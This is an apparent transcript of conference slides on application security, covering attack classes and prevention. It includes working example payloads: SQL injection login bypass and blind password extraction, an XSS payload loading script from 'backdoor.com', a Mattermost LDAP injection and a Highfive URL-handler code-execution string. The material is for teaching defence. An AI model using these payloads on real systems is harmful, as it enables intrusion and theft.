AOEconf17: Application Security - Bastian Ike
0 likes•186 views
The document discusses various aspects of application security, including potential attack vectors such as code execution, SQL injection, and cross-site scripting. It provides examples of these attacks and suggests preventive measures like proper escaping, code reviews, and incident escalation plans. The document emphasizes the importance of staying updated on security issues and reacting swiftly to incidents.
AOEconf17: Application Security - Bastian Ike
- 1. Application Security AOE Conf 2017
- 3. Application Security • Security in software • Not management security, perimeter security, etc • Possible Attack vectors • How to prevent issues
- 5. Code Execution Make a system execute arbitrary code
- 6. Buffer Overflows • Assembler code injected into memory • 1996, Aleph One, "Smashing the stack for fun and profit" • Possible by overflowing a programs memory with controlled data
- 7. SQL Injection • Execute arbitrary SQL code • Possible by interpolating user-submitted data without proper escaping • Can be used to read/write files on DB server
- 8. Cross Site Scripting • Execute arbitrary JavaScript in a privileged context • Executed on a client's machine • Privileged context: Browser (domain/cookies) • Steal/Modify cookies • AJAX Requests to privileged areas
- 9. Cryptography Attack cryptographic measures for confidentiality and integrity
- 10. Signatures • Fake signatures/tokens for unauthorised access
- 11. Encryption • Break encryption • Missing encryption • Broken Encryption: • Example: Bleichenbacher RSA
- 12. Business Logic Make legit code behave in an unintended way
- 13. Race Conditions • Re-order execution flows to change an operations result
- 14. Exploit basics
- 15. SQL Injection • Query: SELECT * FROM users WHERE username="${USERNAME}" AND password="${PASSWORD}"; • Username: Bastian • Passwort: Sesame098 • Query: SELECT * FROM users WHERE username="Bastian" AND password="Sesame098";
- 16. SQL Injection • Query: SELECT * FROM users WHERE username="${USERNAME}" AND password="${PASSWORD}"; • Username: Bastian • Passwort: " OR 1=1 -- x • Query: SELECT * FROM users WHERE username="Bastian" AND password="" OR 1=1 -- x";
- 17. SQL Injection • Query: SELECT * FROM logs WHERE token="${TOKEN}"; • Token: a" AND IF(SUBSTRING( (SELECT password FROM users WHERE name="admin" LIMIT 1) ,0,1) = 'a', SLEEP(5), 0) -- x • Query: SELECT * FROM logs WHERE token="a" AND IF(SUBSTRING( (SELECT password FROM users WHERE name="admin" LIMIT 1) ,0,1) = 'a', SLEEP(5), 0) -- x";
- 18. Cross-Site Scripting • Template: <a href="${page}">You are here</a> • URL: http://example.com/page=hello • Template: <a href="hello">You are here</a>
- 19. Cross-Site Scripting • Template: <a href="${page}">You are here</a> • URL: http://example.com/page="><script src="http://backdoor.com/x.js"></script> • Template: <a href=""><script src="http:// backdoor.com/x.js"></script>">You are here</a>
- 20. Cross-Site Scripting • Code runs in Browser of the one opening the link • Access to Cookies+LocalStorage • Can send requests and read their result (emulate administrator behaviour) • Change page look/behaviour (steal passwords, etc)
- 21. Exploits samples
- 22. Mattermost LDAP Injection • https://mattermost/api/v3/users/login • login_id: username)(givenName=test* • password: "" • Response: • 401: OK, query successful • 50x: Error, query failed
- 26. Mattermost LDAP Injection • Prevention: properly escape characters which might be interpreted by LDAP
- 27. Highfive RCE • Target: URL-Handler highfive:// • Possible arguments: ?domain=, ?protocol=
- 28. Highfive RCE Privileged Non-Privileged Display Web-pages Execute processes etc Highfive Sandbox (NW.js) Whitelist: https://highfive.com https://dev.highfive.com
- 29. Highfive RCE • highfive://test.com.a/? domain=alert(require('child_process').execSyn c('hostname;echo;id').toString())// &protocol=javascript • Starts Highfive on a privileged initial domain • Redirects to: protocol + '://' + domain + path • Becomes: javascript:// alert(require('child_process').execSync('host name;echo;id').toString())//something
- 30. Highfive RCE • Redirect to javascript:// does not change the sandbox • Works on any operating system • Thank you JavaScript 😙
- 31. Highfive RCE • Prevention: whitelist redirect targets
- 32. JWT Null Tokens
- 33. JWT Null Tokens
- 34. JWT Null Tokens
- 35. JWT Null Tokens
- 36. JWT Null Tokens • Prevention: Do not allow null signature algorithms
- 38. Finding Security issues • Code Reviews • Curiosity • (sometimes: automated scanners)
- 39. Stay up to date
- 40. React fast
- 41. React fast • Escalation plan for security incidents • Fast deployment strategies • Firewall setup to cut off possible infected systems • Snapshot infrastructure for later analysis